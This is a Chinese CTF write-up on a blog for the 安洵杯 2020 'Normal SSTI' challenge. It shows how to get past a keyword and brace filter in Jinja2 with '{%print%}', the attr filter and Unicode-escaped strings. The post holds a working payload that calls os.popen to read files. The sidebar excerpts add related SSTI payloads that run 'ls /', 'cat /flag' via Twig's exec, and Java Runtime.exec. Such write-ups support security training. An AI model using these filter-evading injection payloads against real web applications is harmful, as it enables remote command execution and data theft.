[安洵杯 2020]Normal SSTI Unicode编码绕过waf

最新推荐文章于 2024-07-25 13:40:37 发布
最新推荐文章于 2024-07-25 13:40:37 发布
阅读量260 收藏
点赞数
分类专栏: NSSCTF 文章标签: java 服务器 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134164472
版权

这道题已经是很明显的ssti了

然后过滤了 {{}}

我们使用{%%}

然后过滤了许多关键词 但是我们可以使用 Unicode编码绕过 配合上 attr

{%print(lipsum|attr("__globals__")|attr("__getitem__")("os")|attr(popen)("cat /f*")|attr("read")())%}

然后我们需要把特殊替换 命令替换

{%print(lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f")|attr("\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f")("\u006f\u0073")|attr("\u0070\u006f\u0070\u0065\u006e")("\u0063\u0061\u0074\u0020\u002f\u0066\u002a")|attr("read")())%}

即可

或者fenjing一把梭哈即可

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020安洵】EasyCM WriteUp
古月浪子的博客
12-17 493
这题从早上9点开始,做了快3小时,最后被人领先8分钟拿了一血,只拿到一个二血,呜呜呜/(ㄒoㄒ)/~~ 这题IDA有点白给,直接上x32dbg动调 可以看到要比较的字符串 我输入的是111d0g,经过某种加密以后变成了OOOBhKaT 前面有判断输入是不是3的倍数,不是则用-补齐的操作 推测是3位一组,一组输出4个字符,有点像base64 加密操作在这个函数里,会调用length/3次,每次输出4个字符 这个函数是动态解密的,而且dump下来后idapython写IDA里patch后也没法F5,懒得修花
安洵2020部分MISC
楼阁de猫的博客
11-27 340
安洵部分Misc签到王牌特工 签到 公众号回复fl4g,得到链接 下载得到flag.docx,打开是一串表情编码 直接在线emojicode解码 得到flag:D0g3{Welc0m_ANd_H1T_liGht1y} 附上网站:http://www.atoolbox.net/Tool.php?Id=937 王牌特工 得到一个findme文件,改后缀为zip,得到压缩包,里面有flagbox和key.txt感觉是比较有用的,txt有提示是VeraCrypt,用这个key去解密flagbox得到一个假的f
[安洵 2020]Normal SSTI详细解法(Unicode编码绕过
2301_76690905的博客
11-07 493
引用popen,查目录url={%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22)|attr(%22\u0067\u0065\u0074%22)(%22os%22)|attr(%22\u0070\u006f\u0070\u0065\u006e%22)(%22\u006c\u0073\u0020\u002f%22)|等效于{{””.__class__}}
2020安洵部分WP —— 没人比我更懂签到题和问卷题队伍
晚安這個未知的世界
11-26 2401
前言 这次参加2020安洵CTF,感觉题目都并不是很难,除了web题,但是要狠狠的吐槽这个平台,太无语了,一直挂一直掉,提交flag一直卡,时不时网站直接404,简直无语了,下次这样就不想打了,没心情打。还好,第一次参加这个比赛取得了第32名的名次,虽然没有进前十,不过都尽力了,毕竟我太菜了,继续加油,争取下次打进线下。 MISC——签到 题目附件是一个jpg的二维码,扫码关注微信公众号 打开word文档把里面的 打开word文档把里面的表情解码一下就获得flag 解码网站http://www
web SSTI 刷题记录
rev1ve的博客
08-26 650
SSTI模板注入 刷题记录 [CISCN 2019华东南]Web11,[HDCTF 2023]SearchMaster,[HNCTF 2022 WEEK2]ez_SSTI
2020安洵参赛感言
Y5neKO's blog
09-07 187
感言前几天有幸参加了在成信大举办的安洵,首先感谢大佬们带我起飞(虽说大佬们也带不动我,我太菜了555)。经过这次比赛学到了很多,最重要的还是清楚了自己的真正水平,不会再像以前一样膨胀,希望自己也能在接下来的学习道路上戒骄戒躁,稳步前行。本次题目涉及到的题目的Writeup以及知识点总结将会在后面逐步更新,因Web题以及内网渗透环境的原因,Writeup会视情况在环境...
2020 第三届安洵 MISC Writeup
末初的CSDN博客
11-26 4398
题目名称签到王牌特工套娃BeCare4 这次安洵的Misc挺容易的,我这个菜鸡都差点AK了。。。可见难度很一般 签到 Hint: 哥哥们注意文件名 大声说出fl4g.jpg 向公众号回复:fl4g 下载是flag.docx 复制那串特殊符号到记事本 Emojiencode:http://www.atoolbox.net/Tool.php?Id=937 D0g3{Welc0m_ANd_H1T_liGht1y} 王牌特工 file查看,发现是ext3文件系统,直接挂载 使用Vera
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过SSTI,即Server-Side Template Injection,是针对服务器端模板引擎的一种安全漏洞,允许攻击者通过注入恶意代码来控制模板渲染过程,从而获取敏感信息或...
fenjing工具,ssti
12-17
然而,通过使用编码、混淆、分块传输等技巧,攻击者可以尝试使攻击看起来像是合法的流量,从而绕过WAF的检测。Fenjing可能提供了这样的功能,帮助测试人员在面对有WAF保护的目标时,仍然能够有效地识别和利用SSTI...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
SSTI
03-09
**SSTI(Server-Side Template Injection)**是一种严重的网络安全漏洞,主要出现在使用服务器端模板引擎的Web应用程序中。这种漏洞允许攻击者注入恶意代码到服务器端模板,从而执行任意服务器端代码,获取敏感信息...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
BUUCTF web(七)
m0_46616663的博客
11-25 1547
[BJDCTF2020]Cookie is so stable hint里面 抓包看看 猜测这里可能是SSTI,但是试了几个命令都不行 整不会了,看了别的师傅的wp payload: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 参考:https://blog.csdn.net/weixin_44477223/article/details/115673318 [AS
12. Hibernate 模板设计模式
这是一个web全栈开发的博客,取其精华去其糟粕,争取让大家一看就懂,一学就会,一用就成~
07-22 1165
如何运用模板设计模式重构 Hibernate 操作流程;持久化对象与序列化接口;OOP中有一个编码原则 :写仅写一次。翻译过来就是,不要重复,要重用。答案是:使用模板设计模式进一步封装Hibernate的操作。在真实项目中,Hibernate仅仅只是完成项目中的一部分工作,需要和其它,如Spring等框架联合工作,一起承担整体项目的开发。Spring框架中就提供的有Hibernate模板对象。一个常规的、频繁的操作代码中,大部分代码不需要变动,只有小部分代码需要根据需求变动。
Java-Lambda
lizhiwei21的博客
07-21 462
lambda表达式可以理解为对匿名内部类的一种简化 , 但是本质是有区别的面向对象思想 :强调的是用对象去完成某些功能函数式编程思想 :强调的是结果 , 而不是怎么去做。
Java读取文件中多个JSON对象,并且16进制字符串和byte相互转换,将byte转为16进制字符串并写入json文件
weixin_43561432的博客
07-24 163
【代码】Java读取文件中多个JSON对象,并且16进制字符串和byte相互转换,将byte转为16进制字符串并写入json文件。
淘客返利系统中的服务发现与注册机制详解
技术研究中心
07-22 1908
通过服务注册中心,服务提供者可以将自己注册到注册中心,服务消费者可以从注册中心获取服务提供者的地址,以实现服务调用。本文详细介绍了淘客返利系统中服务发现与注册机制的实现,包括Eureka的配置与代码示例。通过Eureka,我们可以轻松实现服务的注册与发现,确保分布式系统中各个服务之间的通信。在本文中,我们将深入探讨淘客返利系统中的服务发现与注册机制,并结合Java代码进行详细讲解。在我们的淘客返利系统中,我们采用Eureka作为服务发现与注册的工具。在我们的淘客返利系统中,首先需要配置Eureka服务器
华为OD机试 - 分披萨 - 递归(Java 2024 D卷 200分)
学Java,找哪吒
07-21 983
递归算法通过函数调用自身解决问题,每次递归调用都处理问题的一个子部分,直到达到基准条件,从而构建最终解。
Java代码基础算法练习-数的特性-2024.07.25
最新发布
Sakurapaid的博客
07-25 175
小A喜欢两种性质都成立的数字,小B喜欢至少符合一种性质的数字,小C喜欢不符合这两种性质的 数字。给出一个数字,请输出三个人是否喜欢这个数字。如果喜欢输出1,否则输出0,用空格分隔。输入数字 num,先定义三个整型代表三个人的喜欢与否,先默认设为 0。之后判断num对于性质1、2的条件,分别用 boolen 类型标识。对于每个整型进行判断,是否改为 1 代表喜欢。性质2:大于4且不大于12;
exploit ssti bypass filter
10-18
SSTI(Server-Side Template Injection)是一种攻击技术,利用服务器端模板注入来执行恶意代码。为了防止SSTI攻击,开发者会采用一些过滤器来检测和阻止潜在的恶意输入。但是,黑客们经常寻找绕过这些过滤器的方法,以成功进行SSTI攻击。 要绕过SSTI过滤器,黑客可能会尝试以下方法: 1. 文件包含漏洞利用: 黑客可能会通过包含恶意文件来执行服务器端代码。他们可以将恶意代码写入可包含的文件,并利用文件包含漏洞将其注入到服务器端模板中。 2. 绕过过滤关键字: 过滤器通常会检测和阻止一些关键字,如"eval"或"exec"等。黑客可以尝试使用编码、拼写错误或其他方式绕过这些关键字过滤。 3. 绕过特殊字符过滤: 过滤器可能会阻止某些特殊字符,如"{{"或"}}"等,以阻止模板注入攻击。黑客可能会尝试使用不同的字符集、字符编码或其他字符替换方法以绕过过滤。 4. 绕过注释: 通过在代码中使用注释来绕过过滤器是一种常见的方法。黑客可能会使用各种注释符号或技术,如HTML注释<!-- -->或Python注释##来绕过过滤。 要防止SSTI攻击的成功,开发者可以采取以下安全措施: 1. 输入校验和过滤: 对于用户输入的数据,开发者应该进行严格的输入校验和过滤。确保输入只包含安全的字符,并且不包含任何恶意代码。 2. 使用安全模板引擎: 选择安全的模板引擎,并了解其特定的安全设定。一些模板引擎提供了自动的输出转义功能,可以帮助防止模板注入攻击。 3. 最小权限原则: 在服务器配置中,应该按照最小权限原则来设置权限。将服务器配置和应用程序代码分离,并根据需要限制服务器的读写和执行权限。 4. 安全更新和漏洞修复: 定期检查并安装系统和应用程序的安全更新,以修复已知的漏洞。 总之,要防止SSTI攻击和绕过过滤器,开发者需要采取一系列合适的安全措施,包括输入过滤、安全模板引擎的使用、最小权限原则和定期更新等。这些措施可以帮助保护服务器免受SSTI攻击的威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值